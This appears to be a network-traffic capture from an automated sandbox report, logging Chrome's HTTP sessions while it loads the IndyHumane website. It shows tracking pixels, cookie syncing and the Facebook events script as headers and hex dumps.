                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://indyhumane.org
                                                                                                                                                                                                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC845INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://indyhumane.org
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:17 GMT
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                        Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:111:0
                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                                                                                        Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:111:0"}],}
                                                                                                                                                                                                                                                        Server: Golfe2
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        114192.168.2.44989098.98.135.244432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC710OUTGET /up/a9d63b08fec1b65f?cntr_url=https%3A%2F%2Findyhumane.org%2F HTTP/1.1
                                                                                                                                                                                                                                                        Host: pixel.sitescout.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Attribution-Reporting-Eligible: event-source=navigation-source, trigger
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC378INHTTP/1.1 302
                                                                                                                                                                                                                                                        set-cookie: ssi=49849c23-3428-4558-a196-de2f709756ec#1736387957597; Domain=.sitescout.com; Expires=Fri, 09-Jan-2026 01:59:17 GMT; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                        location: https://pixel.sitescout.com/up/a9d63b08fec1b65f?cookieQ=1&cntr_url=https%3A%2F%2Findyhumane.org%2F
                                                                                                                                                                                                                                                        content-length: 0
                                                                                                                                                                                                                                                        date: Thu, 09 Jan 2025 01:59:17 GMT
                                                                                                                                                                                                                                                        server: AC1.1
                                                                                                                                                                                                                                                        connection: close


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        115192.168.2.44989244.219.163.774432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC792OUTGET /track.gif?h[site_id]=642b0b5c56d12352021fc47b&h[resource]=https%3A%2F%2Findyhumane.org%2F&h[referrer]=&h[title]=IndyHumane%20-%20IndyHumane&h[user_agent]=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36&h[unique]=1&h[unique_hour]=1&h[unique_day]=1&h[unique_month]=1&h[unique_year]=1&h[screenx]=1280&h[browserx]=1280&h[browsery]=907&timestamp=1736387954872 HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.gaug.es
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC349INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, private
                                                                                                                                                                                                                                                        Content-Type: image/gif
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:17 GMT
                                                                                                                                                                                                                                                        Expires: Sat, 25 Nov 2000 05:00:00 GMT
                                                                                                                                                                                                                                                        Last-Modified: Thu, 09 Jan 2025 01:59:17 GMT
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Server: nginx/1.10.3 (Ubuntu)
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Content-Length: 35
                                                                                                                                                                                                                                                        Connection: Close
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC35INData Raw: 47 49 46 38 39 61 01 00 01 00 80 ff 00 ff ff ff 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                        Data Ascii: GIF89a,D;


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        116192.168.2.449893157.240.252.134432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC361OUTGET /en_US/fbevents.js HTTP/1.1
                                                                                                                                                                                                                                                        Host: connect.facebook.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                        timing-allow-origin: *
                                                                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                        report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                        content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-7a6CblB5' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                                                                        document-policy: force-load-at-top
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1670INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                                                                        Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1INData Raw: 2f
                                                                                                                                                                                                                                                        Data Ascii: /
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC14680INData Raw: 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69 74
                                                                                                                                                                                                                                                        Data Ascii: *** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wit
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC16384INData Raw: 7c 64 3d 3d 3d 22 47 54 4d 22 7c 7c 64 3d 3d 3d 22 4a 53 4f 4e 5f 4c 44 22 7c 7c 64 3d 3d 3d 22 4d 45 54 41 5f 54 41 47 22 7c 7c 64 3d 3d 3d 22 4f 50 45 4e 5f 47 52 41 50 48 22 7c 7c 64 3d 3d 3d 22 52 44 46 41 22 7c 7c 64 3d 3d 3d 22 53 43 48 45 4d 41 5f 44 4f 54 5f 4f 52 47 22 7c 7c 64 3d 3d 3d 22 55 52 49 22 3f 64 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 62 21 3d 6e 75 6c 6c 26 26 63 21 3d 6e 75 6c 6c 26 26 61 21 3d 6e 75 6c 6c 26 26 64 21 3d 6e 75 6c 6c 3f 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 62 2c 65 76 65 6e 74 5f 74 79 70 65 3a 63 2c 65 78 74 72 61 63 74 6f 72 5f 74 79 70 65 3a 64 2c 69 64 3a 61 7d 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 67 28 61 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e
                                                                                                                                                                                                                                                        Data Ascii: |d==="GTM"||d==="JSON_LD"||d==="META_TAG"||d==="OPEN_GRAPH"||d==="RDFA"||d==="SCHEMA_DOT_ORG"||d==="URI"?d:null;return b!=null&&c!=null&&a!=null&&d!=null?{domain_uri:b,event_type:c,extractor_type:d,id:a}:null}function g(a){if(a==null||(typeof a==="undefin
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC16384INData Raw: 75 72 6e 20 6a 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 45 78 70 65 72 69 6d 65 6e 74 73 54 79 70 65 64 65 66 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 29 7b 76 61 72 20 6b 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 6b 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 62 3d 61 2e 54 79 70 65 64 3b 61 2e 63 6f 65 72 63 65 3b 61 2e 65 6e 66 6f
                                                                                                                                                                                                                                                        Data Ascii: urn j.exports}(a,b,c,d)});f.ensureModuleRegistered("SignalsFBEventsExperimentsTypedef",function(){return function(g,h,i,j){var k={exports:{}};k.exports;(function(){"use strict";var a=f.getFbeventsModules("SignalsFBEventsTyped"),b=a.Typed;a.coerce;a.enfo
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC16384INData Raw: 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 42 61 73 65 45 76 65 6e 74 22 29 2c 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 50 69 78 65 6c 54 79 70 65 64 65 66 22 29 2c 63 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 64 3d 63 2e 54 79 70 65 64 2c 65 3d 63 2e 63 6f 65 72 63 65 3b 66 75 6e 63 74 69 6f 6e 20 67 28 61 2c 63 2c 66 2c 67 2c 68 29 7b 61 3d 65 28 61 2c 62 29 3b 63 3d 65 28 63 2c 64 2e 73 74 72 69 6e 67 28 29 29 3b 76 61 72 20 6a 3d 7b 7d 3b 66 21 3d 6e 75 6c 6c 26 26 28 74 79 70 65 6f 66 20 66 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69
                                                                                                                                                                                                                                                        Data Ascii: odules("SignalsFBEventsBaseEvent"),b=f.getFbeventsModules("SignalsFBEventsPixelTypedef"),c=f.getFbeventsModules("SignalsFBEventsTyped"),d=c.Typed,e=c.coerce;function g(a,c,f,g,h){a=e(a,b);c=e(c,d.string());var j={};f!=null&&(typeof f==="undefined"?"undefi
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1703INData Raw: 62 2e 67 65 74 50 72 6f 74 6f 63 6f 6c 2e 63 61 6c 6c 26 26 62 2e 67 65 74 50 72 6f 74 6f 63 6f 6c 28 29 3d 3d 3d 64 3f 62 3a 6e 75 6c 6c 3b 62 21 3d 3d 6e 75 6c 6c 26 26 28 6a 5b 61 5b 30 5d 5d 3d 6a 5b 61 5b 30 5d 5d 7c 7c 7b 7d 2c 6a 5b 61 5b 30 5d 5d 5b 61 5b 31 5d 5d 3d 62 29 3b 72 65 74 75 72 6e 20 62 21 3d 3d 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 76 61 72 20 62 3d 5b 5d 3b 61 3d 6a 5b 61 2e 69 64 5d 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 63 29 26 26 62 2e 70 75 73 68 28 61 5b 63 5d 29 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 61 29 7b 72 65 74 75 72 6e 20 6e 28 61 29 2e 6c
                                                                                                                                                                                                                                                        Data Ascii: b.getProtocol.call&&b.getProtocol()===d?b:null;b!==null&&(j[a[0]]=j[a[0]]||{},j[a[0]][a[1]]=b);return b!==null}function n(a){var b=[];a=j[a.id]||{};for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.push(a[c]);return b}function o(a){return n(a).l
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC14681INData Raw: 6c 26 26 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 61 29 7d 7d 2c 7b 6b 65 79 3a 22 61 64 64 45 6e 63 6f 64 69 6e 67 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 74 68 69 73 3b 69 66 28 67 2e 66 62 71 3d 3d 6e 75 6c 6c 7c 7c 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 69 66 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 76 61 72 20 66 3d 62 28 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 2c 64 2e 6f 62 6a 65 63 74 28 29 29 3b 69 66 28 66 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 66 3d 6b 28 69 28 6a 28
                                                                                                                                                                                                                                                        Data Ascii: l&&(this.moduleEncodings=a)}},{key:"addEncodings",value:function(a){var c=this;if(g.fbq==null||g.fbq.__fbeventsResolvedModules==null)return;if(this.moduleEncodings==null)return;var f=b(g.fbq.__fbeventsResolvedModules,d.object());if(f==null)return;f=k(i(j(
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC16384INData Raw: 6c 73 46 42 45 76 65 6e 74 73 4c 6f 67 67 69 6e 67 22 29 2c 63 3d 62 2e 6c 6f 67 45 72 72 6f 72 3b 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 55 74 69 6c 73 22 29 3b 76 61 72 20 64 3d 62 2e 6d 61 70 2c 65 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 61 72 61 6d 4c 69 73 74 22 29 2c 68 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 42 65 61 63 6f 6e 22 29 2c 69 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 47 45 54 22 29 3b 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65
                                                                                                                                                                                                                                                        Data Ascii: lsFBEventsLogging"),c=b.logError;b=f.getFbeventsModules("SignalsFBEventsUtils");var d=b.map,e=f.getFbeventsModules("SignalsParamList"),h=f.getFbeventsModules("signalsFBEventsSendBeacon"),i=f.getFbeventsModules("signalsFBEventsSendGET");f.getFbeventsModule
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC16384INData Raw: 6e 63 74 69 6f 6e 20 70 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 71 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 26 26 74 79 70 65 6f 66 20 61 21 3d 3d 22 6e 75 6d 62 65 72 22 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d
                                                                                                                                                                                                                                                        Data Ascii: nction p(){return function(a){if(typeof a!=="string")throw new g();return a}}function q(){return function(a){if(typeof a!=="string"&&typeof a!=="number")throw new g();return a}}function r(){return function(a){if((typeof a==="undefined"?"undefined":i(a))!=


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        117192.168.2.44989634.36.216.1504432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC777OUTGET /dmp/asyncPixelSync?cookieQ=1 HTTP/1.1
                                                                                                                                                                                                                                                        Host: pixel-sync.sitescout.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        Cookie: ssi=8b05cf9f-7156-4e8e-80d8-30a255c1b07a#1736387957364
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC788INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        cache-control: max-age=0,no-cache,no-store
                                                                                                                                                                                                                                                        pragma: no-cache
                                                                                                                                                                                                                                                        expires: Tue, 11 Oct 1977 12:34:56 GMT
                                                                                                                                                                                                                                                        p3p: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
                                                                                                                                                                                                                                                        set-cookie: ssi=8b05cf9f-7156-4e8e-80d8-30a255c1b07a#1736387957364; Domain=.sitescout.com; Expires=Fri, 09 Jan 2026 01:59:17 GMT; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                        set-cookie: _ssuma=eyIyIjoxNzM2Mzg3OTU3OTQ1LCI0IjoxNzM2Mzg3OTU3OTQ1LCIzOSI6MTczNjM4Nzk1Nzk0NSwiNyI6MTczNjM4Nzk1Nzk0NSwiOCI6MTczNjM4Nzk1Nzk0NX0; Domain=.sitescout.com; Expires=Sat, 08 Feb 2025 01:59:17 GMT; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                        content-type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                        Content-Length: 1174
                                                                                                                                                                                                                                                        date: Thu, 09 Jan 2025 01:59:17 GMT
                                                                                                                                                                                                                                                        server: A
                                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC602INData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 5f 5f 6c 6f 61 64 5f 61 73 79 6e 63 28 29 20 7b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 61 20 3d 5b 22 68 74 74 70 73 3a 2f 2f 64 70 6d 2e 64 65 6d 64 65 78 2e 6e 65 74 2f 69 62 73 3a 64 70 69 64 3d 38 32 35 33 30 26 64 70 75 75 69 64 3d 38 62 30 35 63 66 39 66 2d 37 31 35 36 2d 34 65 38 65 2d 38 30 64 38 2d 33 30 61 32 35 35 63 31 62 30 37 61 2d 36 37 37 66 32 64 37 35 2d 35 35 35 33 26 67 64 70 72 3d 30 26 67 64 70 72 5f 63 6f 6e 73 65 6e 74 3d 22 2c 22 68 74 74 70 73 3a 2f 2f 70 69 78 65 6c 2e 74 61 70 61
                                                                                                                                                                                                                                                        Data Ascii: <html><body style="margin: 0;"><script type="text/javascript"> function __load_async() { for (var a =["https://dpm.demdex.net/ibs:dpid=82530&dpuuid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent=","https://pixel.tapa
